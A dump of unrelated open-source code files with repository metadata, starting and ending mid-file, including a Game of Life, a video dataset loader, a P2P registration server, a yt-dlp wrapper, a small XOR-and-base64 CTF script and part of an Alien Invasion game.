None:\n options[\"question\"] = \"all\"\n n_questions = SpecificationService.get_n_questions()\n question_list = check_question_list(options[\"question\"], n_questions)\n self.assign_extra_page(\n options[\"username\"],\n options[\"bundle\"],\n options[\"index\"],\n options[\"paper\"],\n question_list,\n )\n elif options[\"command\"] == \"clear\":\n self.clear_extra_page_data(\n options[\"username\"],\n options[\"bundle\"],\n options[\"index\"],\n )\n else:\n self.print_help(\"manage.py\", \"plom_staging_assign_extra\")\n","repo_name":"plomgrading/plom","sub_path":"plom_server/Scan/management/commands/plom_staging_assign_extra.py","file_name":"plom_staging_assign_extra.py","file_ext":"py","file_size_in_byte":5572,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"70046005174","text":"from ..entity import (\n EntitySchema,\n SecondaryEntity,\n)\nfrom ..fields import (\n StringField,\n EntityField,\n MappingField,\n RawField,\n)\nfrom ..secondary.observable import Observable\nfrom ..validators import validate_string\n\n\nclass ObservedRelationSchema(EntitySchema):\n \"\"\"\n https://github.com/threatgrid/ctim/blob/master/doc/structures/sighting.md#observedrelation-object\n \"\"\"\n\n origin = StringField(\n validate=validate_string,\n required=True,\n )\n related = EntityField(\n type=Observable,\n required=True,\n )\n relation = StringField(\n validate=validate_string,\n required=True,\n )\n source = EntityField(\n type=Observable,\n required=True,\n )\n origin_uri = StringField(\n validate=validate_string,\n )\n relation_info = MappingField(\n keys=StringField,\n values=RawField,\n )\n\n\nclass ObservedRelation(SecondaryEntity):\n schema = ObservedRelationSchema\n","repo_name":"CiscoSecurity/tr-05-ctim-bundle-builder","sub_path":"bundlebuilder/models/secondary/observed_relation.py","file_name":"observed_relation.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"19543552403","text":"from board import Board\r\nfrom life_like_automata import LifeLike\r\n\r\nclass GameOfLife(LifeLike):\r\n \"\"\"\r\n Conway's Game of Life automata.\r\n Each new state follows this rules:\r\n * Any live cell with fewer than two live neighbours dies, as if by underpopulation.\r\n * Any live cell with two or three live neighbours lives on to the next generation.\r\n * Any live cell with more than three live neighbours dies, as if by overpopulation.\r\n * Any dead cell with exactly three live neighbours becomes a live cell, as if by reproduction.\r\n \"\"\"\r\n def __init__(self, board):\r\n super().__init__(board)\r\n \r\n assert self.board.range == 1, \"Illegal number of states possible.\"\r\n\r\n def determine_next_cell_state(self, cell, neighbors):\r\n \"\"\"\r\n Process the logic necesarry to update a given cell of the automata.\r\n\r\n Returns\r\n -------\r\n cell : int\r\n A number that represents the state of a cell, either a 0 or a 1.\r\n \"\"\"\r\n if cell == self.ALIVE_CELL:\r\n if neighbors == 0 or neighbors == 1 or neighbors > 3:\r\n cell = self.DEAD_CELL\r\n else:\r\n if neighbors == 3:\r\n cell = self.ALIVE_CELL\r\n\r\n return cell","repo_name":"benstt/automatek","sub_path":"src/game_of_life.py","file_name":"game_of_life.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32348428616","text":"minimum_string_length = 
1\nrequired_char_length = 1\n\ndef count_character_appearances(letter, target_string):\n if not _inputs_are_valid(letter, target_string):\n return False\n return len([l for l in target_string if l == letter])\n\ndef find_character_appearances(letter, target_string):\n if not _inputs_are_valid(letter, target_string):\n return False\n appearances = []\n for i in range(0, len(target_string)):\n if target_string[i] != letter: continue\n appearances.append(i)\n return appearances\n\ndef _inputs_are_valid(letter, target_string):\n # arguments_valid = True\n # if not isinstance(target_string, str):\n # arguments_valid = False\n # if len(target_string) == 0:\n # arguments_valid = False\n # if not isinstance(letter, str):\n # arguments_valid = False\n # if len(letter) != 1:\n # arguments_valid = False\n # return arguments_valid\n if not isinstance(letter, str) or not isinstance(target_string, str):\n return False\n if len(target_string) < minimum_string_length:\n return False\n if len(letter) != required_char_length:\n return False\n return True\n\nif __name__ == '__main__':\n print(count_character_appearances('a', 'aardvark'))\n print(find_character_appearances('a', 'aardvark'))\n","repo_name":"jsoules/vs-code-introduction","sub_path":"05-refactoring-tools/assets/example3d-editing.py","file_name":"example3d-editing.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"12642631866","text":"import cv2\nimport torchvision\nimport toml\nimport numpy as np\n\nclass Dataset(torchvision.datasets.VisionDataset):\n\n\n def __init__(self, root, train=True, transforms=None, transform=None, target_transform=None):\n super(Dataset, self).__init__(root, transforms, transform, target_transform)\n self.root = root\n label_path = f'{self.root}/0.toml'\n label_dist = toml.load(label_path)\n self.action_label_dist = label_dist['Action label']\n self.path_and_label = list(label_dist['Video label'].items())\n data_number = len(self.path_and_label)\n train_number = int(data_number * 5 / 6)\n if train:\n self.number = train_number\n self.path_and_label = self.path_and_label[:train_number]\n else:\n self.path_and_label = self.path_and_label[train_number:]\n self.number = len(self.path_and_label)\n\n def __getitem__(self, index):\n video_name, label = self.path_and_label[index]\n video_path = f'{self.root}/{video_name}'\n cap = cv2.VideoCapture(video_path)\n if not cap.isOpened():\n raise ValueError('No file in path. 
Check the `root` path.')\n frame_number = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n video = []\n for _ in range(int(frame_number)):\n ok, image = cap.read()\n if not ok: \n raise ValueError('Failed read video.')\n video.append(image.T)\n return np.array(video).astype(np.float32), self.action_label_dist[label]\n\n\n\n def __len__(self):\n return self.number\n\nif __name__ == '__main__':\n root = 'data/uiuc_T01_camera_action_dataset'\n train_t01 = Dataset(root, train=True)\n test_t01 = Dataset(root, train=False)\n print(f'Train : {train_t01}')\n print(f'Test : {test_t01}')\n","repo_name":"latte488/camera_action_dataset","sub_path":"camera_action_dataset.py","file_name":"camera_action_dataset.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22999174907","text":"import random\nrocklist = [\"rock\",\"paper\", \"scissors\"]\n\ndef get_yn(prompt):\n play = input(str(prompt) + \" (y/n) \")\n first = play[0]\n play = first.lower()\n return play\n\ndef userinput():\n while True:\n user = input(\"Rock, Paper, Scissors?\")\n user = user.lower()\n if user in rocklist:\n return rocklist.index(user)\n else:\n print(\"Bad Input. Please type from list\")\n\ndef compare(user, com):\n if user == 0:\n if com == 0:\n return \"tie\"\n elif com == 1:\n return(\"com\")\n elif com == 2:\n return \"user\"\n elif user == 1:\n if com == 0:\n return \"user\"\n elif com == 1:\n return \"tie\"\n elif com == 2:\n return \"com\"\n elif user == 2:\n if com == 0:\n return \"com\"\n elif com == 1:\n return \"user\"\n elif com == 2:\n return \"tie\"\n\ndef playGame():\n user = userinput()\n print(\"User Chose: \" + rocklist[user] )\n com = random.randrange(0,3,1)\n print(\"Com Chose: \" + rocklist[com] )\n return compare(user, com)\n\n\ndef playGameLoop():\n print(\"welcome to RPS\")\n\n play = get_yn(\"Play a round of RPS?\")\n\n\n while play == \"y\" :\n winner = playGame()\n print(\"winner: \" + winner)\n play = get_yn(\"Play RPS again?\")\n\n\nplayGameLoop()","repo_name":"jonahdjohansen/jonahdjohansen.github.io","sub_path":"CS160/Python/RockPaper.py","file_name":"RockPaper.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42361719677","text":"# Python file to implement the Registration Server(RS) that maintains the Peer list data structure.\n\n# Created for CSC573 - Project1\n\n# Author hpalani and akrish12\n\nimport random\nimport time\nimport socket\nimport pickle\nimport platform\n\n\n# Class that contains the record of each peer\nclass PeerData:\n def __init__(self, host=None, port_number=None, cookie=None):\n self.hname = host\n self.port = port_number\n self.flag_active = True\n self.cookie = cookie # Cookie assigned to the peer\n self.TTL = 7200 # TTL field\n self.recent_regtime = time.strftime(\"%H:%M:%S\") # Recent time/date the peer has registered\n if self.cookie == None:\n print('In None block')\n self.cookie = random.randint(1, 50)\n print(self.cookie)\n self.number_of_activetimes = 0\n else:\n self.cookie = cookie\n self.number_of_activetimes = calculate_instance(self.hname, peer_list)\n\n\n# Class to maintain the list of Peers\nclass PeerList:\n def __init__(self):\n self.head = None\n\n def add(self, peer):\n temp = NodePeer(peer)\n temp.setnext(self.head)\n self.head = temp\n\n def display(self):\n temp = self.head\n while temp != None:\n peer_obj = temp.peer_obj()\n print(\"Peer object data\", 
peer_obj.hname, peer_obj.port, peer_obj.cookie, peer_obj.flag_active, peer_obj.TTL\n                  , peer_obj.number_of_activetimes, peer_obj.recent_regtime)\n            temp = temp.getnext_peer()\n\n\n# Class that maintains the pointer of various peers\nclass NodePeer:\n    def __init__(self, obj: PeerData):\n        self.peer_objt = obj\n        self.next = None\n\n    def peer_obj(self):\n        return self.peer_objt\n\n    def getnext_peer(self):\n        return self.next\n\n    def setpeer_obj(self, obj: PeerData):\n        self.peer_objt = obj\n\n    def setnext(self, newnext):\n        self.next = newnext\n\n\n# Build the list of active peers, after checking that the requesting peer has registered\ndef checkpeer_list(list: PeerList, host):\n    peer_list1 = PeerList()\n    check = check_peer(list, host)\n    temp = list.head\n    while temp != None:\n        peer_obj = temp.peer_obj()\n        if check == True and peer_obj.flag_active == True:\n            print('Both are found')\n            peer_list1.add(peer_obj)\n            temp = temp.getnext_peer()\n        elif check == True and peer_obj.flag_active == False:\n            print('Peer left recently. Please register again with cookie to get list of active peers')\n            temp = temp.getnext_peer()\n        else:\n            print('Please register to get list of Peers')\n            temp = temp.getnext_peer()\n    peer_list1.display()\n    return peer_list1\n\n\n# When a peer leaves the system, the activity flag is changed to False or Inactive\ndef setinactive(host, list: PeerList):\n    temp = list.head\n    while temp != None:\n        peer_obj = temp.peer_obj()\n        if peer_obj.hname == host:  # The corresponding check is made before making the flag as inactive\n            peer_obj.flag_active = False\n            print('Flag is set to False')\n            temp = temp.getnext_peer()\n        else:\n            temp = temp.getnext_peer()\n\n\n# Count the number of times a peer has been active\ndef calculate_instance(host, list: PeerList):\n    temp = list.head\n    while temp != None:\n        peer_obj = temp.peer_obj()\n        if peer_obj.hname == host:\n            peer_obj.number_of_activetimes += 1\n            temp = temp.getnext_peer()\n            return peer_obj.number_of_activetimes\n        else:\n            temp = temp.getnext_peer()\n    return 0\n\n\n# Function to check whether the peer has registered or not\ndef check_peer(list: PeerList, host):\n    temp = list.head\n    check = False\n    if temp == None:\n        print('No peer has registered')\n    while temp != None:\n        peer_obj = temp.peer_obj()\n        if peer_obj.hname == host:\n            check = True\n            temp = temp.getnext_peer()\n        else:\n            temp = temp.getnext_peer()\n    return check\n\n\nserverName = ''\nserverPort = 64800\nserverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # AF_INET - network is IPv4, SOCK_STREAM is TCP Socket\nserverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # To avoid the Time Wait State\nserverSocket.bind((serverName, serverPort))\nserverSocket.listen(10)  # Accept 10 connections at a time\n\npeer_list = PeerList()\nactivepeer_list = PeerList()\nwhile True:\n    client_connection, client_address = serverSocket.accept()\n    response_message = client_connection.recv(2048).decode('utf-8')  # Fetching host, port and cookie\n    host = response_message[response_message.index('Host') + len('Host')  # info from the response message\n                            + 1: response_message.index(' \\nPort')]\n    port = response_message[response_message.index('Port') + len('Port')\n                            + 1: response_message.index(' \\nCookie')]\n    Cookie = response_message[response_message.index('Cookie') + len('Cookie')\n                              + 1: response_message.index(' \\n ')]\n\n    # Check if the peer wants to register and perform corresponding activities\n    if \"Register\" in response_message:\n        if Cookie == 'None':\n            print('Creating an object without cookie')\n            peer_obj = 
PeerData(host, port) # Peer object without cookie\n else:\n peer_obj = PeerData(host, port, Cookie) # Peer object with cookie\n activepeer_list = checkpeer_list(peer_list, host)\n\n if check_peer(activepeer_list, host) == True:\n client_connection.close()\n else:\n peer_list.add(peer_obj)\n peer_list.display()\n print('Peer registration successful')\n response_message = \"P2P-DI/1.0 200 OK\" + \"\\r\\n\" + \\\n \"Date: \" + time.strftime(\"%H:%M:%S\") + \"\\r\\n\" + \\\n \"OS: \" + platform.platform() + \"\\r\\n\" + \\\n \"cookie: \" + str(peer_obj.cookie)\n client_connection.send(response_message.encode('utf-8'))\n client_connection.close()\n\n # To cater the request from client to know about the list of active peers\n elif \"PQuery\" in response_message:\n peer_list.display()\n activepeer_list = checkpeer_list(peer_list, host)\n if activepeer_list.head != None:\n print('Sending the linked list') # List that has active peers\n client_connection.send(pickle.dumps(activepeer_list, pickle.HIGHEST_PROTOCOL)) # To use highest protocol\n client_connection.close()\n\n # If a peer wants to leave from the system, the following statements are executed and flag is set to inactive\n elif \"Leave\" in response_message:\n setinactive(host, peer_list)\n peer_list.display()\n client_connection.send(\"You have left the system\".encode('utf-8'))\n client_connection.close()\n\n","repo_name":"arunkrishce/PeerToPeer","sub_path":"p1/p1/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23175181690","text":"import os\n\n\ndef findMax(data):\n maximum = -1\n maxKey = str()\n for key, value in data.items():\n if value > maximum:\n maximum = value\n maxKey = key\n \n return maxKey, maximum\n \n\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\nfile = open(os.path.join(__location__,\"rosalind_gc.txt\"), \"r\")\n\nlines = file.readlines()\ndata = dict()\ni = 0\nwhile True:\n \n if i >= len(lines):\n break\n \n value = str()\n key = lines[i].strip('>').strip('\\n')\n \n i += 1\n \n if i >= len(lines):\n break\n \n while lines[i][0] != '>':\n value += (lines[i].strip(\"\\n\"))\n i += 1\n if i >= len(lines):\n break\n \n c = value.count('C')\n g = value.count('G')\n \n data.update({key:(c+g)*100/len(value)})\n \na, b = findMax(data)\n\nprint(a)\nprint(b) ","repo_name":"qedrohenrique/exercises","sub_path":"Rosalind/GC.py","file_name":"GC.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31125979553","text":"\"\"\"\nThis program is a command line interface program \nfor the \"yt-dlp\" Youtube downloader python library. \nAllows you to choose name of the saved file, choose \nvideo time intervals, and download the youtube link.\nMade on 9/18/2023 \n\"\"\"\n\nimport os; os.system('clear')\nimport subprocess\nfrom pytube import YouTube\nfrom termcolor import colored as c\nimport inquirer #pip3 install inquirer\n\nsave_dir = \"a_songs_folder\"\n# save_dir = \"Youtube_videos\"\n#save_dir = \"Other_Youtube\"\n\nCURRENT_DOWNLOAD_PATH = f\"../{save_dir}/\"\n\nif os.path.exists(CURRENT_DOWNLOAD_PATH):\n os.system(f\"open -a Finder '{CURRENT_DOWNLOAD_PATH}'\")\n print(f\"{c('CURRENT DOWNLOAD PATH', 'magenta')}: {os.path.abspath(CURRENT_DOWNLOAD_PATH)}/\")\n print(\"Finder has been opened to current download path. 
See updates in real time.\")\nelse:\n print(c(f\"\\nPath does not exist: \\\"{CURRENT_DOWNLOAD_PATH}\\\"\", 'red'))\n print(\"Go and fix path\\n\")\n exit(0)\n\ndef time_to_seconds(time) -> int:\n \"\"\" Converts a formatted time string to int seconds. \"\"\"\n t = [int(x) for x in time.split(\":\")]\n return t[1] + (t[0] * 60) if (len(t) == 2) else t[2] + (t[1] * 60) + (t[0] * 3600)\n\ndef seconds_to_time(seconds) -> str:\n \"\"\" Converts int seconds to a formatted time string \"\"\"\n if seconds < 60:\n return f\"0:{seconds:02}\"\n elif seconds < 3600:\n minutes = seconds // 60\n seconds %= 60\n return f\"{minutes}:{seconds:02}\"\n else:\n hours = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n return f\"{hours}:{minutes:02}:{seconds:02}\"\n\ndef get_choice(the_message):\n green_yes = c(\"Yes\", 'green')\n red_no = c('No', 'red')\n\n print()\n questions = [\n inquirer.List('choice',\n message=the_message,\n choices=[green_yes, red_no]\n ),\n ]\n\n answers = inquirer.prompt(questions)\n return answers\n\nurl = input(f\"\\nEnter {c('youtube link', 'red')} : \")\n\nvideo_len = YouTube(url).length\n\nprint(f\"Video length is {c(seconds_to_time(video_len), 'cyan')}\")\n\nmessage = f\"Do you want to download a {c('specific time interval', 'blue')} (y/n) ? \"\nis_time_interval = get_choice(message)\n\nif \"Yes\" in is_time_interval['choice'] : #'\\x1b[32mYes\\x1b[0m' the color made the string weird \n print(\"\\nThe format has to be (00:00:00) or (00:00). Ex: 3:12:11 or 8:07 or 21:32\")\n\n start_time = input(\"\\nEnter a start time: \").strip()\n\n while (time_to_seconds(start_time) > video_len):\n print(\"\\nInvalid start time\")\n start_time = input(\"Enter a start time: \").strip()\n\n end_time = input(\"Enter an end time: \").strip()\n\n while (time_to_seconds(end_time) > video_len):\n print(\"\\nInvalid end time\")\n end_time = input(\"Enter an end time: \").strip()\n\n download_length = seconds_to_time(time_to_seconds(end_time) - time_to_seconds(start_time))\n\n print(f\"\\nLength of download will be -> {c(download_length, 'blue')}\\n\")\n\n new_name = \"\"\n\n rename_message = f\"Do you want to rename the file? {c('(y/n)', 'red')} \"\n do_rename = get_choice(rename_message)\n\n if \"Yes\" in do_rename['choice']: \n name = input(\"\\nNew name of file (without extension): \")\n new_name = f'-o \"{name}.%(ext)s\"'\n print(f\"File's new name is {c(name, 'blue')}{c('.webm', 'blue')}\")\n\n print()\n download_with_time = get_choice(\"Ready to download? \")\n\n if \"Yes\" in download_with_time['choice']: \n\n os.chdir(CURRENT_DOWNLOAD_PATH)\n\n print()\n os.system(f'yt-dlp {new_name.strip()} \"{url.strip()}\" --download-sections \"*{start_time}-{end_time}\"')\n print(c(\"VIDEO SUCCESSFULLY DOWNLOADED\", 'green'))\n \n get_file_name = subprocess.check_output(\"ls -t | head -n 1\", shell=True)\n name_of_file = get_file_name.decode('utf-8').strip()\n name_of_file_wo_extension = name_of_file.rsplit('.', 1)[0]\n\n print()\n convert_video_message = f\"Do you want to convert the video to {c('mp4', 'blue')}? \"\n convert_video = get_choice(convert_video_message)\n\n if \"Yes\" in convert_video['choice']: \n os.system(f\"ffmpeg -i \\\"{name_of_file_wo_extension}\\\".webm \\\"{name_of_file_wo_extension}\\\".mp4\")\n os.remove(f\"{name_of_file_wo_extension}.webm\")\n print(c(\"Successfully deleted the webm file and converted to mp4\", 'green'))\n\n print(c(\"Done\", 'green'))\n\n exit(0)\n\n\nnew_name = \"\"\n\nprint()\nrename_message = f\"Do you want to rename the file? 
{c('(y/n)', 'red')} \"\nrename_vid = get_choice(rename_message)\n\nif \"Yes\" in rename_vid['choice']: \n name = input(\"\\nNew name of file (without extension): \")\n new_name = f'-o \"{name.strip()}.%(ext)s\"'\n print(f\"File's new name is {c(name, 'blue')}{c('.webm', 'blue')}\")\n\nprint()\ndownload_vid = get_choice(\"Ready to download? \")\n\nif \"Yes\" in download_vid['choice']: \n os.chdir(CURRENT_DOWNLOAD_PATH)\n\n print()\n\n #--no-mtime sets the date created to now \n os.system(f'yt-dlp --no-mtime {new_name} \"{url.strip()}\"')\n\n print(c(\"VIDEO SUCCESSFULLY DOWNLOADED\", 'green'))\n \n # Run the shell command and capture its output\n get_file_name = subprocess.check_output(\"ls -t | head -n 1\", shell=True)\n\n # Convert the byte string to a regular string\n name_of_file = get_file_name.decode('utf-8').strip()\n name_of_file_wo_extension = name_of_file.rsplit('.', 1)[0]\n \n print()\n convert_vid_message = f\"Do you want to convert the video to {c('mp4', 'blue')}? \"\n convert_vid = get_choice(convert_vid_message)\n\n if \"Yes\" in convert_vid['choice']: \n os.system(f\"ffmpeg -i \\\"{name_of_file_wo_extension}\\\".webm \\\"{name_of_file_wo_extension}\\\".mp4\")\n os.remove(f\"{name_of_file_wo_extension}.webm\")\n print(c(\"Successfully deleted the webm file and converted to mp4\", 'green'))\n \n print(c(\"Done\", 'green'))","repo_name":"MichaelT-178/Modern-Python-Files","sub_path":"YT_downloader_helper.py","file_name":"YT_downloader_helper.py","file_ext":"py","file_size_in_byte":5847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"42841053289","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 13 21:34:12 2019\n\n@author: ricardo\n\"\"\"\nimport csv\nimport sqlite3\nimport argparse\nimport logging\n# import au_texto\n\nlogging.basicConfig(filename=\"./log/csv_to_sqlite.log\", format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-i', '--input',\n help='name of the video',\n required=True)\n\n ret = parser.parse_args()\n return ret\n\n\nconn = sqlite3.connect(\"./../tfm_server/db.sqlite3\")\ncursor = conn.cursor()\n# args = get_args()\n\nwith open('predictions.csv') as csv_file:\n try:\n # it works for only one file at a time for now\n args = get_args()\n name = args.input\n name = name.split('/')[-1]\n print(f'name: {name}')\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count > 0:\n cursor.execute('''INSERT INTO clasifications_clasifications(video_name, path, label, score)\n VALUES(?,?,?,?)''', (name, row[2],\n row[1], float(row[0])))\n line_count += 1\n conn.commit()\n except Exception as e:\n logger.warning(f'{e}')\nconn.close()\n","repo_name":"ricardocancar/TFM","sub_path":"codigo/csv_to_sqlite.py","file_name":"csv_to_sqlite.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"7530456253","text":"import sys\r\nimport string\r\n\r\ndef xor(s):\r\n\r\n\ta = ''.join(chr(ord(i)^3) for i in s)\r\n\treturn a\r\n\r\n\r\ndef encoder(x):\r\n\t\r\n\treturn x.encode(\"base64\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\tf = open(\"C:\\\\Users\\\\hello\\\\Desktop\\\\vip.txt\", \"w\")\r\n\r\n\tarr = sys.argv[1]\r\n\r\n\tarr = 
encoder(xor(arr))\r\n\r\n\tf.write(arr)\r\n\r\n\tf.close()\r\n","repo_name":"teambi0s/InCTFi","sub_path":"2018/Forensics/EvilCrypter/Admin/evilscript.py","file_name":"evilscript.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":143,"dataset":"github-code","pt":"21"}
+{"seq_id":"25113111497","text":"# This file is part of Parametric Text, a Fusion 360 add-in for creating text\r\n# parameters.\r\n#\r\n# Copyright (c) 2020 Thomas Axelsson\r\n# \r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n# \r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n# \r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\n# Helper functions for formatting parameter values\r\n\r\nimport math\r\nimport fractions\r\n\r\ndef mixed_frac_inch(param, design):\r\n if param.unit == '':\r\n # Unit-less\r\n inch_value = param.value\r\n else:\r\n inch_value = design.fusionUnitsManager.convert(param.value, 'internalUnits', 'in')\r\n\r\n sign_char = ''\r\n if math.copysign(1, inch_value) < 0:\r\n sign_char = '-'\r\n\r\n # Convert the number to a fractional number (\"1.75\" to \"1 3/4\")\r\n frac = abs(fractions.Fraction(inch_value).limit_denominator())\r\n \r\n # Get the integer part (\"1\" from \"1 3/4\"), if it's not 0.\r\n int_part = int(frac)\r\n\r\n # Get the fractional part (\"3/4\" from \"1 3/4\"), if it's not 0.\r\n fractional_part = frac % 1\r\n\r\n value = sign_char\r\n if int_part == 0 and fractional_part == 0:\r\n value += '0'\r\n elif int_part == 0:\r\n value += str(fractional_part)\r\n elif fractional_part == 0:\r\n value += str(int_part)\r\n else:\r\n value += f'{int_part} {fractional_part}'\r\n value += '\"'\r\n\r\n # Build the mixed fraction (\"(-)1 3/4\")\r\n return value\r\n","repo_name":"thomasa88/ParametricText","sub_path":"paramformatter.py","file_name":"paramformatter.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"}
+{"seq_id":"31879470244","text":"# This program calculates the minimum fixed monthly amount to pay over the year against a credit card balance. 
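The loop stops once the midpoint is within one cent of either bound. 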
Rounds off to nearest cent.\n# Uses bisection algorithm for efficient calculation.\n# Formula is given below\n\n#Monthly interest rate = (Annual interest rate) / 12.0\n#Monthly payment lower bound = Balance / 12\n#Monthly payment upper bound = (Balance x (1 + Monthly interest rate)**12) / 12.0\n\n#balance - the outstanding balance on the credit card\n#annualInterestRate - annual interest rate as a decimal\n\nbalance = 320000\nannualInterestRate = 0.2\n\nmir = annualInterestRate/12.0\nlb = float(\"{0:.2f}\".format(balance/12.0))\nub = float(\"{0:.2f}\".format((balance * (1 + mir)**12)/12.0))\n\ndef cb(balance, fmp):\n b = balance\n for i in range(12):\n mub = b - fmp\n b = mub + (mir * mub)\n return float(\"{0:.2f}\".format(b))\n\nfmp = 0\nwhile lb <= ub:\n mid = float(\"{0:.2f}\".format((lb+ub)/2))\n balanceLow = cb(balance, fmp=lb)\n balanceMid = cb(balance, fmp=mid)\n balanceHigh = cb(balance, fmp=ub)\n\n if balanceMid == 0 or mid-lb<0.01 or ub-mid<0.01:\n fmp = mid\n break\n elif balanceMid > 0:\n lb = mid\n else:\n ub = mid\n\nprint(fmp)\n","repo_name":"abhinavmall/PythonStuff","sub_path":"Problem1.py","file_name":"Problem1.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"74993113971","text":"# This class provides methods to process the output of the LLM before it is returned to the user.\nclass PostProcessor:\n\n # takes a PDDL condition or effect statement and makes it into a string that can be converted to\n # a list using the 'eval' function\n def listify(result):\n result = \"['\" + result + \"']\"\n result = result.replace(\"['(and \",\"['\")\n result = result.replace(\")'] \",\"']\")\n result = result.replace(\")) \",\"))', '\")\n result = result.replace(\", ]\",\"]\")\n return result\n\n # returns a list of indices, where each index corresponds to an item in the list\n # of code segments that contains a predicate which is not present in the input text.\n def checkPreds(codeLs, inputText, preds):\n indices = []\n count = 0\n for code in codeLs:\n predCount = 0\n for ls in preds:\n string = \"pred0\"+str(predCount)\n if (string in code) and (string not in inputText):\n indices.append(count)\n predCount += 1\n count += 1\n return indices\n\n # returns a list of indices, where each index corresponds to an item in the list of \n # code segments that does not have correct PDDL syntax\n def checkSyntax(codeLs, params, preds):\n count = 0\n indices = []\n for code in codeLs:\n code = '0' + code\n code = code.replace(\"(\",\"+1\")\n code = code.replace(\")\",\"-1\")\n predCount = 0\n for ls in preds:\n string = \"pred0\"+str(predCount)\n code = code.replace(string,\"+1\")\n predCount += 1\n code = code.replace(\"?\",\"/\")\n paramCount = 0\n for ls in params:\n string = \"param0\"+str(paramCount)\n code = code.replace(string,\"1\")\n paramCount += 1\n code = code.replace(\"at start\",\"\")\n code = code.replace(\"at end\",\"\")\n code = code.replace(\"over all\",\"\")\n code = code.replace(\"not\",\"\")\n code = code.replace(\"?\",\"?\")\n correctSyntax = False\n try:\n num = eval(code)\n if int(num):\n if (num == 1):\n correctSyntax = True # correct syntax\n else:\n correctSyntax = True # incorrect number of brackets, but this is ignored\n except (SyntaxError, NameError):\n pass\n if not correctSyntax:\n indices.append(count)\n count += 1\n return indices\n\n # modifies the list of code segments so that it contains only those segments with\n # predicates that are present in the 
input, and that have correct syntax\n def removeIrrelevantCode(codeLs, inputText, params, preds):\n indices1 = PostProcessor.checkPreds(codeLs, inputText, preds)\n indices1.sort(reverse=True)\n for ind in indices1:\n if ind < len(codeLs):\n codeLs.pop(ind)\n indices2 = PostProcessor.checkSyntax(codeLs, params, preds)\n indices2.sort(reverse=True)\n for ind in indices2:\n if ind < len(codeLs):\n codeLs.pop(ind)\n return codeLs\n","repo_name":"QuMuLab/temporal-nl-to-pddl","sub_path":"postProcessor.py","file_name":"postProcessor.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41777532283","text":"import pygame\nfrom settings import Settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\nfrom pygame.sprite import GroupSingle\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\nfrom high_scores import HighScores\nfrom game_over import GameOver\nfrom alien import Alien\nfrom explosion import Explosion\nfrom high_scores import HighScores\nfrom boss_alien import BossAlien\n\n\ndef run_game():\n BLACK = (0, 0, 0)\n pygame.init()\n settings = Settings()\n screen = pygame.display.set_mode((settings.get_dims()))\n pygame.display.set_caption('Alien Invasion')\n\n #play_button = Button(screen, 'Play')\n play_button = pygame.Rect(564, 598, 72, 29)\n scores_button = 